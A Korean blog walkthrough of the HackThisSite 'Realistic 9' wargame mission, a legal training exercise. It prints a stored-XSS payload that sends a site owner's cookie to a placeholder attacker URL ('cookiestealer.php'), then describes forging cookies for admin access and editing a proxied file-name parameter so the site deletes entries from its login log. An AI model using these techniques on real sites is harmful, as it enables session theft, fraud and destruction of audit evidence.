googleAdsense_widever


hackthissite - realistic - 9 해킹

친구가 돈이 필요해서 회사 사이트를 해킹해서 임금을 보내달란다.


마음씨 좋은 간부보단 멍청한 간부가 좋군

알려준 친구의 id로 접속하자.

Username: r-conner@crappysoft.com
Password: ilovemywork

pay salaries로 들어가자.

You are not an administrator
란다.

private message 탭으로 들어가자.

오너와 샐러리맨 둘, 개발자 한 명의 주소가 드롭박스에 보인다.
오너의 id는 m-crap@crappycoft.com 되겠다.

cookie에서 username을 m-cap으로 바꿔봐도 승인이 안떨어진다.
sql injection을 해보자. 안된다.

해답은 private message 탭의 기능이다. 여기에 script를 삽입하면 되겠다.
아.. realistic 2 이후로는 국내 사이트에선 정보찾기가 힘들다..

hackthissite forum 에도 스포일러라며 안가르쳐준다. 지미 
어쩔 수 없다. 내 손으로 해결보는 수밖에..
드림위버 끄적거릴 때를 기억해보자..

<form action="pm.php" method="POST">
<table width="90%"><tr>
<td width="20%">To:</td><td><select name="receiver">
<option value="m-crap@crappysoft.com">m-crap (owner) </option>
<option value="r-conner@crappysoft.com">r-conner (Sales man)</option>
<option value="K-huibert@crappysoft.com">k-huibert (Sales man)</option>
<option value="K-mercomic@crappysoft.com">k-mecormic (Developer)</option></td>
<td width="10%"><a href="./read">Read Messages</a> </td></tr><tr>
<td width="20%">Subject:</td>
<td><input name="topic" type="text" size="67"></td></tr><tr>
<td width="20%">Message:</td>
<td width="20"><textarea name="message" rows="5" cols="50"></textarea></td></tr></table><hr>
<input type="submit" name="btnAction" value="Send">
</form>

위 소스에서 <input name="topic" type="text" size="67"> 부분을 수정하여, 멍청한 사장이 메일을 읽어보면 그 사장의 브라우저에서 쿠키값을 읽어와 내 메일로 보내주는 스크립트를 발동(?)시키도록 하면되겠다.

물론 멍청한 사장은 애초에 없으므로 적당한 스크립트를 보내면 알아서 자동으로 보내주도록 짜놓았겠지.

결국 youtube를 찾았다..



다음과 같이 cross-side script(XSS) 를 이용한다.

stealcookie.php
javascript:void(window.location="www.yourwebsite.com/cookiestealer.php" + document.cookie)

즉, owner가 이 메일을 읽으면 자바스크립트가 실행되어 지정한 php파일을 불러오면서 document.cookie 즉, 그 owner의 쿠키 값을 첨부하는 것이다.
음, 

저 패스워드와 initID 값을 쿠키에서 수정하면 administrator로 로그인 된다.

그리고 pay salaries 로 가서 임금을 보내주면 된다.
그러면 이제 로그까지 지워달라고 한다.(owner는 스크립트가 실행되는건 자기 pc에서 뻔히 봤는데 로그그 지워봤자 소용이 있겠나 싶지만 컴맹오너라고 하자..?)

Demo 탭 > Here Hyper-text의 주소를 보면
http://www.hackthissite.org/missions/realistic/9/files/downloads/CrappyDemo.exe.zip
이다.

http://www.hackthissite.org/missions/realistic/9/files/ 로 가서 디렉토리 리스팅을 해본다. 

http://www.hackthissite.org/missions/realistic/9/files/logs/logs.txt
216.239.57.99 - Login at 15:15 2003-11-5
209.73.164.91 - Bad Login at 03:40 2003-11-8

로그를 확인하고 mailing list tab 으로 이동한다.
mailing list가 관리되는 파일은 
http://www.hackthissite.org/missions/realistic/9/files/mailinglist/addresses.txt 에 있다.

mailing list 를 보면

Enter your email address here:
(Note: This adds your email to the list, and at the same time, checks the list for anything without the '@' character and deletes it.)

라고 하는데, 이것을 log를 지우는데 이용한다.

log file의 
216.239.57.99 - Login at 15:15 2003-11-5
209.73.164.91 - Bad Login at 03:40 2003-11-8

mailing list 입력박스에 216.239.57.99 를 입력하고,

proxy tool로 request 패킷을 낚아서
strFilename=.%2Ffiles%2Fmailinglist%2Faddresses.txt&strEmailAddress=216.239.57.99 부분을
strFilename=.%2Ffiles%2Flogs%2Flogs.txt&strEmailAddress=216.239.57.99 로 바꾸어 보내면 된다.

그러면 이메일이 아니라, 접속내역을 지우게 된다.

fire fox의 fire bug 를 이용하면 브라우저에서 바로 소스를 수정할 수 있는데, 크롬판 fire bug나 개발자 도구로는 그게 안된다..
안타깝다. 별로 쓰고 싶지않던 FF를 다시 다운 받는 중..
아무튼 끝.




덧글

댓글 입력 영역


공지

어서오십시오.
트위터 : @FCliver
기저심리학 : 네이버카페
카카오톡 : FCliver
페이스북 : Fredric Cliver

통계 위젯 (화이트)

216
50
288487

접속자 위치